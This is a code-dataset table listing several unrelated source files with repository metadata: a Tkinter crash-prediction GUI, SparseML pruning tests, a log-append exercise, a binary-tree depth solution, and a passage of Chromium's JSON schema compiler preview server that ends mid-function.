hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0069da6201085be93267ce6305ea86fc96eb9fed | 20,127 | py | Python | src/GUI/Final_GUI.py | suchetsapre/vehicle-crash-prediction | c6fa4ee37f026b42f4ccadb7337205f0b61008c0 | [
"MIT"
] | null | null | null | src/GUI/Final_GUI.py | suchetsapre/vehicle-crash-prediction | c6fa4ee37f026b42f4ccadb7337205f0b61008c0 | [
"MIT"
] | null | null | null | src/GUI/Final_GUI.py | suchetsapre/vehicle-crash-prediction | c6fa4ee37f026b42f4ccadb7337205f0b61008c0 | [
"MIT"
] | null | null | null | """ Running this file will allow for experimentation with my GUI """
from __future__ import print_function
import datetime
import math
import os
from tkinter import *
import PIL.Image
import PIL.ImageTk
import cv2
import keras
import matplotlib.pyplot as plt
import numpy as np
import pytube
from src.ML_Application import Filtered_Input_Data_Creation
from src.Naive_Crash_Predictor import NCP_Algorithm
# This path will vary based on where the dataset is stored on your local machine.
path_to_dashcam_video_dataset = "../../../Crash_Detection_Project/"
path_to_youtube_vids = './Sample_Generated_YouTube_Videos/'
path_to_generated_prediction_vids = './Sample_Generated_Prediction_Videos/'
class CreateToolTip(object):
"""
Author: crxguy52
Date: March 25, 2016
Create a tooltip for a given widget
"""
def __init__(self, widget, text='widget info'):
self.waittime = 500 # miliseconds
self.wraplength = 180 # pixels
self.widget = widget
self.text = text
self.widget.bind("<Enter>", self.enter)
self.widget.bind("<Leave>", self.leave)
self.widget.bind("<ButtonPress>", self.leave)
self.id = None
self.tw = None
def enter(self, event=None):
self.schedule()
def leave(self, event=None):
self.unschedule()
self.hidetip()
def schedule(self):
self.unschedule()
self.id = self.widget.after(self.waittime, self.showtip)
def unschedule(self):
id = self.id
self.id = None
if id:
self.widget.after_cancel(id)
def showtip(self, event=None):
x = y = 0
x, y, cx, cy = self.widget.bbox("insert")
x += self.widget.winfo_rootx() + 25
y += self.widget.winfo_rooty() + 20
self.tw = Toplevel(self.widget) # Remove "tk"
self.tw.wm_overrideredirect(True)
self.tw.wm_geometry("+%d+%d" % (x, y))
label = Label(self.tw, text=self.text, justify='left',
background="#ffffff", relief='solid', borderwidth=1,
wraplength=self.wraplength)
label.pack(ipadx=1)
def hidetip(self):
tw = self.tw
self.tw = None
if tw:
tw.destroy()
class FrameExtractor():
'''
Author: erykml
Link: https://gist.github.com/erykml/6a1fe38763664567e6052e78e047ebb5
Class used for extracting frames from a video file.
'''
def __init__(self, video_path):
self.video_path = video_path
self.vid_cap = cv2.VideoCapture(video_path)
self.n_frames = int(self.vid_cap.get(cv2.CAP_PROP_FRAME_COUNT))
self.fps = int(self.vid_cap.get(cv2.CAP_PROP_FPS))
def get_video_duration(self):
''' Prints the duration of the given video '''
duration = self.n_frames / self.fps
print(f'Duration: {datetime.timedelta(seconds=duration)}')
def get_n_images(self, every_x_frame):
n_images = math.floor(self.n_frames / every_x_frame) + 1
print(f'Extracting every {every_x_frame} (nd/rd/th) frame would result in {n_images} images.')
def extract_frames(self, every_x_frame, img_name, dest_path=None, img_ext='.jpg'):
if not self.vid_cap.isOpened():
self.vid_cap = cv2.VideoCapture(self.video_path)
if dest_path is None:
dest_path = os.getcwd()
else:
if not os.path.isdir(dest_path):
os.mkdir(dest_path)
print(f'Created the following directory: {dest_path}')
frame_cnt = 0
img_cnt = 0
while self.vid_cap.isOpened():
success, image = self.vid_cap.read()
if not success:
break
if frame_cnt % every_x_frame == 0:
img_path = os.path.join(dest_path, ''.join([img_name, '_', str(img_cnt), img_ext]))
cv2.imwrite(img_path, image)
img_cnt += 1
frame_cnt += 1
self.vid_cap.release()
cv2.destroyAllWindows()
def extract_first_frame(self, img_name, dest_path=None, img_ext='.jpg'):
if not self.vid_cap.isOpened():
self.vid_cap = cv2.VideoCapture(self.video_path)
if dest_path is None:
dest_path = os.getcwd()
else:
if not os.path.isdir(dest_path):
os.mkdir(dest_path)
print(f'Created the following directory: {dest_path}')
success, image = self.vid_cap.read()
if not success: return 0
img_path = os.path.join(dest_path, ''.join([img_name, '_', str(0), img_ext]))
cv2.imwrite(img_path, image)
self.vid_cap.release()
cv2.destroyAllWindows()
def main():
global frameRate
global depthDifferential
global distanceDifferential
global lookAhead
global youtubeFile
global priority
youtubeFile = None
priority = 0 # 0 : drop down; 1 : youtube
img_size = (300, 175)
def show_video(cap, wait_time):
if not cap.isOpened():
print("Error opening video file")
while cap.isOpened():
ret, frame = cap.read()
if ret:
cv2.imshow('Frame', frame)
if cv2.waitKey(wait_time) & 0xFF == ord('q'):
break
else:
break
cap.release()
cv2.destroyAllWindows()
def clicked_sim():
'''
Video 1: output36.avi
Video 2: output31.avi
Video 3: output37.avi
'''
header_label1.config(text="Processing")
video_num = variable.get()
video_name = ""
if video_num == "Video 1":
video_name = "OutputVideos/Demo_Video1.avi"
elif video_num == "Video 2":
video_name = "OutputVideos/Demo_Video2.avi"
elif video_num == "Video 3":
video_name = "OutputVideos/Demo_Video3.avi"
cap = cv2.VideoCapture(video_name)
global frameRate
wait_time = max(int(1000 / 30), 1)
show_video(cap, wait_time)
header_label1.config(text="Video Display")
print("DONE")
def clicked_sim2():
header_label1.config(text="Processing")
start_frame = 0
end_frame = 100
video_name = ""
video_num = variable.get()
global priority
global youtubeFile
if youtubeFile is not None and priority == 1:
start_frame = -1
video_name = path_to_youtube_vids + youtubeFile
elif video_num == "Video 1": # video 74
video_name = path_to_dashcam_video_dataset + 'videos/training/positive/000074.mp4'
start_frame = 55
end_frame = 100
elif video_num == "Video 2": # video 30
video_name = path_to_dashcam_video_dataset + 'videos/training/positive/000030.mp4'
start_frame = 27
end_frame = 40
elif video_num == "Video 3": # video 78
video_name = path_to_dashcam_video_dataset + 'videos/training/positive/000078.mp4'
start_frame = 39
end_frame = 100
global frameRate
global depthDifferential
global distanceDifferential
global lookAhead
if priority == 0:
vid_tag = video_num + '_Depth_' + str(depthDifferential) + '_Distance_' + str(
distanceDifferential) + '_LookAhead_' + str(lookAhead)
else:
vid_tag = youtubeFile[:-4] + '_Depth_' + str(depthDifferential) + '_Distance_' + str(
distanceDifferential) + '_LookAhead_' + str(lookAhead)
output_file = path_to_generated_prediction_vids + vid_tag + '.avi'
NCP_Algorithm.process_predict_output(start_frame, end_frame, video_name, frameRate, depthDifferential,
distanceDifferential, lookAhead, output_file)
cap = cv2.VideoCapture(output_file)
wait_time = max(int(1000 / frameRate), 1)
show_video(cap, wait_time)
print('DONE')
def clicked_logo():
video_url = youtube_entry.get()
vid = pytube.YouTube(video_url)
compressed_video_title = vid.title
cap = cv2.VideoCapture(path_to_youtube_vids + compressed_video_title + ".mp4")
global frameRate
wait_time = max(int(1000 / frameRate), 1)
show_video(cap, wait_time)
def clicked_yt():
"""
Potential YouTube Crash Videos
1. https://www.youtube.com/watch?v=S3QgwUyajys
2. https://www.youtube.com/watch?v=M3EtizAg9Z4
3. https://www.youtube.com/watch?v=ybpXPfvZG1Y
4. https://www.youtube.com/watch?v=jS7TPAO0c7g
5. https://www.youtube.com/watch?v=5DEdR5lqnDE
6. https://www.youtube.com/watch?v=5G4-LjIdRL0
7. https://www.youtube.com/watch?v=ybpXPfvZG1Y
"""
youtube_label.config(text="Downloading...")
video_url = youtube_entry.get()
vid_stream = pytube.YouTube(video_url).streams
mp4_stream = vid_stream.filter(file_extension="mp4")
mp4_stream.first().download('./Sample_Generated_YouTube_Videos/')
youtube_label.config(text="Download Complete! Enter Another YT Link Here")
vid = pytube.YouTube(video_url)
compressed_video_title = vid.title
fe = FrameExtractor(path_to_youtube_vids + compressed_video_title + '.mp4')
fe.extract_first_frame(compressed_video_title, path_to_youtube_vids)
im = PIL.Image.open(path_to_youtube_vids + compressed_video_title + '_0' + '.jpg')
im = im.resize(img_size)
ph = PIL.ImageTk.PhotoImage(im)
image_label = Label(window, image=ph)
image_label.image = ph
image_label.grid(column=1, row=10)
global youtubeFile
global priority
youtubeFile = compressed_video_title + '.mp4'
priority = 1
def get_depth_differential(*args):
""" Obtains the value from the depth differential scale. """
global depthDifferential
depthDifferential = scale1.get()
def get_distance_differential(*args):
""" Obtains the value from the distance differential scale. """
global distanceDifferential
distanceDifferential = scale2.get()
def get_frame_rate(*args):
""" Obtains the value from the frame rate scale. """
global frameRate
frameRate = scale3.get()
def get_look_ahead(*args):
""" Obtains the value from the look ahead scale. """
global lookAhead
lookAhead = scale4.get()
''' ML CODE BELOW '''
def read_images_from_video(filename):
""" Returns the frames given a video filename. """
vid_cap = cv2.VideoCapture(filename)
success, image = vid_cap.read()
count = 0
frames = []
while success:
frames.append(np.array(PIL.Image.fromarray(image)))
success, image = vid_cap.read()
count += 1
return frames
def run_ml_model_filtered():
model = keras.models.load_model(
'../ML_Models/filtered_input_model_lossoptimization.h5') # FirstCondensedModelTest.h5 corresponds with 1pct
vid_num = int(ml_video_number.get())
vid_num_reformatted = '{:06}'.format(vid_num)
vid_filepath = 'TEMP'
if 620 >= vid_num >= 456:
vid_filepath = path_to_dashcam_video_dataset + 'videos/testing/positive/' + vid_num_reformatted + '.mp4'
if 1130 >= vid_num >= 830:
vid_filepath = path_to_dashcam_video_dataset + 'videos/testing/negative/' + vid_num_reformatted + '.mp4'
x_data = [Filtered_Input_Data_Creation.convert_video_to_data(vid_filepath)]
x_data_padded = []
pad_len = 69 # 37 for 1pct datafile, 65 for 10pct datafile, 69 for 100pct datafile
for vid_data in x_data:
pad_vid = np.pad(vid_data, ((0, 0), (0, pad_len - vid_data.shape[1])), 'constant')
x_data_padded.append(pad_vid)
x_test = np.array(x_data_padded)
pred = model.predict(x_test)
plt.plot(pred[0])
plt.xlabel('Frame Number')
plt.ylabel('Probability of Crash Within Next 20 Frames')
plt.savefig('GUI_ScreenShots/ML_Plot_Filtered_Video_' + str(vid_num) + '.png')
plt.clf()
ml_im = PIL.Image.open('GUI_ScreenShots/ML_Plot_Filtered_Video_' + str(vid_num) + '.png')
ml_im = ml_im.resize((int(img_size[0] * 1.3), int(img_size[1] * 1.5)))
ml_ph = PIL.ImageTk.PhotoImage(ml_im)
ml_image_label = Label(window, image=ml_ph)
ml_image_label.image = ml_ph
ml_image_label.grid(column=6, row=10)
def run_ml_model_images():
''' Given a .h5 file and a video number from the text box, output the probability vs. frame graph of the ML crash prediction model. '''
model = keras.models.load_model('my_model2.h5')
vid_num = int(ml_video_number.get())
vid_num_reformatted = '{:06}'.format(vid_num)
vid_filepath = 'TEMP'
if 620 >= vid_num >= 456:
vid_filepath = path_to_dashcam_video_dataset + 'videos/testing/positive/' + vid_num_reformatted + '.mp4'
if 1130 >= vid_num >= 830:
vid_filepath = path_to_dashcam_video_dataset + 'videos/testing/negative/' + vid_num_reformatted + '.mp4'
x_test = read_images_from_video(vid_filepath)
for i in range(len(x_test)):
x_test[i] = cv2.resize(x_test[i], (178, 100), interpolation=cv2.INTER_AREA)
x_test[i] = cv2.cvtColor(x_test[i], cv2.COLOR_RGB2GRAY)
x_test = np.reshape(x_test, (100, 100, 178, 1))
pred = model.predict(x_test)
plt.plot(pred)
plt.xlabel('Frame Number')
plt.ylabel('Probability of Crash Within Next 20 Frames')
plt.savefig('GUI_ScreenShots/ML_Plot_Images_Video_' + str(vid_num) + '.png')
plt.clf()
ml_im = PIL.Image.open('GUI_ScreenShots/ML_Plot_Images_Video_' + str(vid_num) + '.png')
ml_im = ml_im.resize((int(img_size[0] * 1.3), int(img_size[1] * 1.5)))
ml_ph = PIL.ImageTk.PhotoImage(ml_im)
ml_image_label = Label(window, image=ml_ph)
ml_image_label.image = ml_ph
ml_image_label.grid(column=6, row=10)
window = Tk()
window.title("Car Crash Prediction UI")
window.geometry("1400x780")
title_label = Label(window, text="Linear Approximation Approach", font='Helvetica 24 bold')
title_label.grid(column=1, row=3)
youtube_label = Label(window, text="Enter Youtube Link Here", font='Helvetica 16')
youtube_label.grid(column=2, row=1)
youtube_entry = Entry(window)
youtube_entry.grid(column=2, row=2)
youtube_button = Button(window, text="Get Video", bg="orange", fg="red", command=clicked_yt)
youtube_button.grid(column=3, row=2)
youtube_button_ttp = CreateToolTip(youtube_button, "Click this button to fetch the YouTube video from the internet")
im_1 = PIL.Image.open('GUI_ScreenShots/YTLogo.png')
im_1 = im_1.resize((75, 50))
ph_1 = PIL.ImageTk.PhotoImage(im_1)
logo_button = Button(window, image=ph_1, bg="orange", fg="red", command=clicked_logo)
logo_button.grid(column=3, row=1)
logo_button_ttp = CreateToolTip(logo_button, "Click this button to play the YouTube video on screen")
run_button = Button(window, text="Run Baseline Crash Prediction", bg="orange", fg="red", command=clicked_sim)
run_button.grid(column=0, row=11)
run_button2 = Button(window, text="Run User-Parameter Crash Prediction", bg="orange", fg="red",
command=clicked_sim2)
run_button2.grid(column=2, row=11)
run_button_ttp = CreateToolTip(run_button, "Click this button in order to run the crash prediction algorithm")
run_button2_ttp = CreateToolTip(run_button2,
"Click this button in order to run the crash prediction algorithm using USER selected parameters")
OPTIONS = [
"Video 1",
"Video 2",
"Video 3"
] # etc
variable = StringVar(window)
variable.set(OPTIONS[0]) # default value
drop_down_label = Label(window, text="Select Video")
drop_down_label.grid(column=0, row=0)
dropdown = OptionMenu(window, variable, *OPTIONS)
dropdown.grid(column=0, row=0)
dropdown_ttp = CreateToolTip(dropdown, "Use this dropdown to change the test video")
header_label1 = Label(window, text="Video Display", font='Helvetica 18')
header_label1.grid(column=1, row=9)
im = PIL.Image.open('GUI_ScreenShots/Thumbnail_Video1.jpg')
im = im.resize(img_size)
ph = PIL.ImageTk.PhotoImage(im)
image_label = Label(window, image=ph)
image_label.grid(column=1, row=10)
def callback(*args):
global priority
priority = 0
print(variable.get())
if variable.get() == "Video 1":
im = PIL.Image.open('GUI_ScreenShots/Thumbnail_Video1.jpg')
im = im.resize(img_size)
ph = PIL.ImageTk.PhotoImage(im)
image_label = Label(window, image=ph)
image_label.image = ph
image_label.grid(column=1, row=10)
elif variable.get() == "Video 2":
im = PIL.Image.open('GUI_ScreenShots/Thumbnail_Video2.jpg')
im = im.resize(img_size)
ph = PIL.ImageTk.PhotoImage(im)
image_label = Label(window, image=ph)
image_label.image = ph
image_label.grid(column=1, row=10)
elif variable.get() == "Video 3":
im = PIL.Image.open('GUI_ScreenShots/Thumbnail_Video3.jpg')
im = im.resize(img_size)
ph = PIL.ImageTk.PhotoImage(im)
image_label = Label(window, image=ph)
image_label.image = ph
image_label.grid(column=1, row=10)
variable.trace('w', callback)
header_label2 = Label(window, text="Parameters", font='Helvetica 18')
header_label2.grid(column=1, row=4)
header_label2_ttp = CreateToolTip(header_label2,
"Use these scale parameters to adjust the algorithm and video playback")
scale_label1 = Label(window, text="Depth Differential")
scale_label1.grid(column=0, row=5)
scale1 = Scale(window, from_=1, to=100, command=get_depth_differential)
scale1.grid(column=0, row=6)
scale_label2 = Label(window, text="Distance Differential")
scale_label2.grid(column=1, row=5)
scale2 = Scale(window, from_=1, to=100, command=get_distance_differential)
scale2.grid(column=1, row=6)
scale_label3 = Label(window, text="Frame Rate")
scale_label3.grid(column=2, row=5)
scale3 = Scale(window, from_=1, to=250, command=get_frame_rate)
scale3.grid(column=2, row=6)
scale_label4 = Label(window, text="Look Ahead")
scale_label4.grid(column=3, row=5)
scale4 = Scale(window, from_=1, to=20, command=get_look_ahead)
scale4.grid(column=3, row=6)
ml_label = Label(window, text="Machine Learning Application", font='Helvetica 24 bold')
ml_label.grid(column=6, row=3)
ml_label2 = Label(window, text="Enter Video Number Here. \n Positive (456-620); Negative (830-1130).",
font='Helvetica 18')
ml_label2.grid(column=6, row=5)
ml_label2_ttp = CreateToolTip(ml_label2, "Select the testing video here")
ml_video_number = Entry(window)
ml_video_number.grid(column=6, row=6)
ml_run_button = Button(window, text="Run ML Algorithm", bg="orange", fg="red", command=run_ml_model_filtered)
ml_run_button.grid(column=6, row=7)
ml_run_button_ttp = CreateToolTip(ml_run_button, "Use this button to run the ML algorithm on the selected video")
ml_graph_label = Label(window, text="Output Display", font='Helvetica 18')
ml_graph_label.grid(column=6, row=8)
ml_im = PIL.Image.open('GUI_ScreenShots/Thumbnail_ML_Graph.png')
ml_im = ml_im.resize(img_size)
ml_ph = PIL.ImageTk.PhotoImage(ml_im)
ml_image_label = Label(window, image=ml_ph)
ml_image_label.grid(column=6, row=10)
window.mainloop()
if __name__ == "__main__":
main()
| 35.749556 | 143 | 0.63303 |
86575be3471988faff2bb12d17535b26f8d23550 | 4,497 | py | Python | tests/sparseml/pytorch/sparsification/pruning/test_modifier_pruning_constant.py | anmarques/sparseml | c8352f1d896bfb1258add4e563d8163d3702b5ef | [
"Apache-2.0"
] | null | null | null | tests/sparseml/pytorch/sparsification/pruning/test_modifier_pruning_constant.py | anmarques/sparseml | c8352f1d896bfb1258add4e563d8163d3702b5ef | [
"Apache-2.0"
] | null | null | null | tests/sparseml/pytorch/sparsification/pruning/test_modifier_pruning_constant.py | anmarques/sparseml | c8352f1d896bfb1258add4e563d8163d3702b5ef | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
from sparseml.pytorch.sparsification.pruning import ConstantPruningModifier
from tests.sparseml.pytorch.helpers import LinearNet
from tests.sparseml.pytorch.optim.test_modifier import (
ScheduledModifierTest,
create_optim_adam,
create_optim_sgd,
)
from tests.sparseml.pytorch.sparsification.pruning.helpers import (
state_dict_save_load_test,
)
from tests.sparseml.pytorch.helpers import ( # noqa isort:skip
test_epoch,
test_loss,
test_steps_per_epoch,
)
@pytest.mark.skipif(
os.getenv("NM_ML_SKIP_PYTORCH_TESTS", False),
reason="Skipping pytorch tests",
)
@pytest.mark.parametrize(
"modifier_lambda",
[
lambda: ConstantPruningModifier(
params=["re:.*weight"],
),
lambda: ConstantPruningModifier(
params=["seq.fc1.weight"],
start_epoch=10.0,
end_epoch=25.0,
),
],
scope="function",
)
@pytest.mark.parametrize("model_lambda", [LinearNet], scope="function")
@pytest.mark.parametrize(
"optim_lambda",
[create_optim_sgd, create_optim_adam],
scope="function",
)
class TestConstantPruningModifier(ScheduledModifierTest):
def test_lifecycle(
self,
modifier_lambda,
model_lambda,
optim_lambda,
test_steps_per_epoch, # noqa: F811
):
modifier = modifier_lambda()
model = model_lambda()
optimizer = optim_lambda(model)
self.initialize_helper(modifier, model)
# check sparsity is not set before
if modifier.start_epoch >= 0:
for epoch in range(int(modifier.start_epoch)):
assert not modifier.update_ready(epoch, test_steps_per_epoch)
epoch = int(modifier.start_epoch) if modifier.start_epoch >= 0 else 0.0
assert modifier.update_ready(epoch, test_steps_per_epoch)
modifier.scheduled_update(model, optimizer, epoch, test_steps_per_epoch)
if modifier.end_epoch >= 0:
epoch = int(modifier.end_epoch)
assert modifier.update_ready(epoch, test_steps_per_epoch)
modifier.scheduled_update(model, optimizer, epoch, test_steps_per_epoch)
for epoch in range(
int(modifier.end_epoch) + 1, int(modifier.end_epoch) + 6
):
assert not modifier.update_ready(epoch, test_steps_per_epoch)
def test_state_dict_save_load(
self,
modifier_lambda,
model_lambda,
optim_lambda,
test_steps_per_epoch, # noqa: F811
):
state_dict_save_load_test(
self,
modifier_lambda,
model_lambda,
optim_lambda,
test_steps_per_epoch,
False,
)
@pytest.mark.skipif(
os.getenv("NM_ML_SKIP_PYTORCH_TESTS", False),
reason="Skipping pytorch tests",
)
def test_constant_pruning_yaml():
start_epoch = 5.0
end_epoch = 15.0
params = ["re:.*weight"]
yaml_str = f"""
!ConstantPruningModifier
start_epoch: {start_epoch}
end_epoch: {end_epoch}
params: {params}
"""
yaml_modifier = ConstantPruningModifier.load_obj(
yaml_str
) # type: ConstantPruningModifier
serialized_modifier = ConstantPruningModifier.load_obj(
str(yaml_modifier)
) # type: ConstantPruningModifier
obj_modifier = ConstantPruningModifier(
start_epoch=start_epoch, end_epoch=end_epoch, params=params
)
assert isinstance(yaml_modifier, ConstantPruningModifier)
assert (
yaml_modifier.start_epoch
== serialized_modifier.start_epoch
== obj_modifier.start_epoch
)
assert (
yaml_modifier.end_epoch
== serialized_modifier.end_epoch
== obj_modifier.end_epoch
)
assert yaml_modifier.params == serialized_modifier.params == obj_modifier.params
| 30.591837 | 84 | 0.675339 |
79c8b5f1703df05e862d8ef8c4a60ed59537eca6 | 356 | py | Python | week5/week5_practical4b_3.py | harshonyou/SOFT1 | 1bd2b0cc26d39c549bec576389bebd0fd011387d | [
"Apache-2.0"
] | null | null | null | week5/week5_practical4b_3.py | harshonyou/SOFT1 | 1bd2b0cc26d39c549bec576389bebd0fd011387d | [
"Apache-2.0"
] | null | null | null | week5/week5_practical4b_3.py | harshonyou/SOFT1 | 1bd2b0cc26d39c549bec576389bebd0fd011387d | [
"Apache-2.0"
] | null | null | null | '''
Exercise 3:
Write a function save_to_log(entry, logfile) that takes two parameters, a string
entry to be written at the end of the text file named logfile (also a string). The previous
content of the logfile MUST NOT be erased
'''
def save_to_log(entry, logfile):
with open(logfile,'a') as x:
print(entry, file=x)
save_to_log('more','ayy') | 32.363636 | 91 | 0.724719 |
87bbb9d0ae9573ba6ce6cc44ff55519120b8c402 | 405 | py | Python | maxDepth.py | gardenia22/leetcode | 1e24425eea5d0aa31742719de80380b3f116ee51 | [
"CC0-1.0"
] | null | null | null | maxDepth.py | gardenia22/leetcode | 1e24425eea5d0aa31742719de80380b3f116ee51 | [
"CC0-1.0"
] | null | null | null | maxDepth.py | gardenia22/leetcode | 1e24425eea5d0aa31742719de80380b3f116ee51 | [
"CC0-1.0"
] | null | null | null | ° # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param {TreeNode} root
# @return {integer}
def maxDepth(self, root):
if root is None:
return 0
else:
return max(self.maxDepth(root.left), self.maxDepth(root.right))+1
| 22.5 | 77 | 0.558025 |
db4550ea6aef8cb51058af6923cf43d2f7355da6 | 12,559 | py | Python | tools/json_schema_compiler/preview.py | google-ar/chromium | 2441c86a5fd975f09a6c30cddb57dfb7fc239699 | [
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | tools/json_schema_compiler/preview.py | harrymarkovskiy/WebARonARCore | 2441c86a5fd975f09a6c30cddb57dfb7fc239699 | [
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | tools/json_schema_compiler/preview.py | harrymarkovskiy/WebARonARCore | 2441c86a5fd975f09a6c30cddb57dfb7fc239699 | [
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Server for viewing the compiled C++ code from tools/json_schema_compiler.
"""
import cc_generator
import code
import cpp_type_generator
import cpp_util
import h_generator
import idl_schema
import json_schema
import model
import optparse
import os
import shlex
import urlparse
from highlighters import (
pygments_highlighter, none_highlighter, hilite_me_highlighter)
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from cpp_namespace_environment import CppNamespaceEnvironment
from namespace_resolver import NamespaceResolver
class CompilerHandler(BaseHTTPRequestHandler):
"""A HTTPRequestHandler that outputs the result of tools/json_schema_compiler.
"""
def do_GET(self):
parsed_url = urlparse.urlparse(self.path)
request_path = self._GetRequestPath(parsed_url)
chromium_favicon = 'http://codereview.chromium.org/static/favicon.ico'
head = code.Code()
head.Append('<link rel="icon" href="%s">' % chromium_favicon)
head.Append('<link rel="shortcut icon" href="%s">' % chromium_favicon)
body = code.Code()
try:
if os.path.isdir(request_path):
self._ShowPanels(parsed_url, head, body)
else:
self._ShowCompiledFile(parsed_url, head, body)
finally:
self.wfile.write('<html><head>')
self.wfile.write(head.Render())
self.wfile.write('</head><body>')
self.wfile.write(body.Render())
self.wfile.write('</body></html>')
def _GetRequestPath(self, parsed_url, strip_nav=False):
"""Get the relative path from the current directory to the requested file.
"""
path = parsed_url.path
if strip_nav:
path = parsed_url.path.replace('/nav', '')
return os.path.normpath(os.curdir + path)
def _ShowPanels(self, parsed_url, head, body):
"""Show the previewer frame structure.
Code panes are populated via XHR after links in the nav pane are clicked.
"""
(head.Append('<style>')
.Append('body {')
.Append(' margin: 0;')
.Append('}')
.Append('.pane {')
.Append(' height: 100%;')
.Append(' overflow-x: auto;')
.Append(' overflow-y: scroll;')
.Append(' display: inline-block;')
.Append('}')
.Append('#nav_pane {')
.Append(' width: 20%;')
.Append('}')
.Append('#nav_pane ul {')
.Append(' list-style-type: none;')
.Append(' padding: 0 0 0 1em;')
.Append('}')
.Append('#cc_pane {')
.Append(' width: 40%;')
.Append('}')
.Append('#h_pane {')
.Append(' width: 40%;')
.Append('}')
.Append('</style>')
)
body.Append(
'<div class="pane" id="nav_pane">%s</div>'
'<div class="pane" id="h_pane"></div>'
'<div class="pane" id="cc_pane"></div>' %
self._RenderNavPane(parsed_url.path[1:])
)
# The Javascript that interacts with the nav pane and panes to show the
# compiled files as the URL or highlighting options change.
body.Append('''<script type="text/javascript">
// Calls a function for each highlighter style <select> element.
function forEachHighlighterStyle(callback) {
var highlighterStyles =
document.getElementsByClassName('highlighter_styles');
for (var i = 0; i < highlighterStyles.length; ++i)
callback(highlighterStyles[i]);
}
// Called when anything changes, such as the highlighter or hashtag.
function updateEverything() {
var highlighters = document.getElementById('highlighters');
var highlighterName = highlighters.value;
// Cache in localStorage for when the page loads next.
localStorage.highlightersValue = highlighterName;
// Show/hide the highlighter styles.
var highlighterStyleName = '';
forEachHighlighterStyle(function(highlighterStyle) {
if (highlighterStyle.id === highlighterName + '_styles') {
highlighterStyle.removeAttribute('style')
highlighterStyleName = highlighterStyle.value;
} else {
highlighterStyle.setAttribute('style', 'display:none')
}
// Cache in localStorage for when the page next loads.
localStorage[highlighterStyle.id + 'Value'] = highlighterStyle.value;
});
// Populate the code panes.
function populateViaXHR(elementId, requestPath) {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState != 4)
return;
if (xhr.status != 200) {
alert('XHR error to ' + requestPath);
return;
}
document.getElementById(elementId).innerHTML = xhr.responseText;
};
xhr.open('GET', requestPath, true);
xhr.send();
}
var targetName = window.location.hash;
targetName = targetName.substring('#'.length);
targetName = targetName.split('.', 1)[0]
if (targetName !== '') {
var basePath = window.location.pathname;
var query = 'highlighter=' + highlighterName + '&' +
'style=' + highlighterStyleName;
populateViaXHR('h_pane', basePath + '/' + targetName + '.h?' + query);
populateViaXHR('cc_pane', basePath + '/' + targetName + '.cc?' + query);
}
}
// Initial load: set the values of highlighter and highlighterStyles from
// localStorage.
(function() {
var cachedValue = localStorage.highlightersValue;
if (cachedValue)
document.getElementById('highlighters').value = cachedValue;
forEachHighlighterStyle(function(highlighterStyle) {
var cachedValue = localStorage[highlighterStyle.id + 'Value'];
if (cachedValue)
highlighterStyle.value = cachedValue;
});
})();
window.addEventListener('hashchange', updateEverything, false);
updateEverything();
</script>''')
def _ShowCompiledFile(self, parsed_url, head, body):
"""Show the compiled version of a json or idl file given the path to the
compiled file.
"""
api_model = model.Model()
request_path = self._GetRequestPath(parsed_url)
(file_root, file_ext) = os.path.splitext(request_path)
(filedir, filename) = os.path.split(file_root)
namespace_resolver = NamespaceResolver("./",
filedir,
self.server.include_rules,
self.server.cpp_namespace_pattern)
try:
# Get main file.
namespace = namespace_resolver.ResolveNamespace(filename)
type_generator = cpp_type_generator.CppTypeGenerator(
api_model,
namespace_resolver,
namespace)
# Generate code
if file_ext == '.h':
cpp_code = (h_generator.HGenerator(type_generator)
.Generate(namespace).Render())
elif file_ext == '.cc':
cpp_code = (cc_generator.CCGenerator(type_generator)
.Generate(namespace).Render())
else:
self.send_error(404, "File not found: %s" % request_path)
return
# Do highlighting on the generated code
(highlighter_param, style_param) = self._GetHighlighterParams(parsed_url)
head.Append('<style>' +
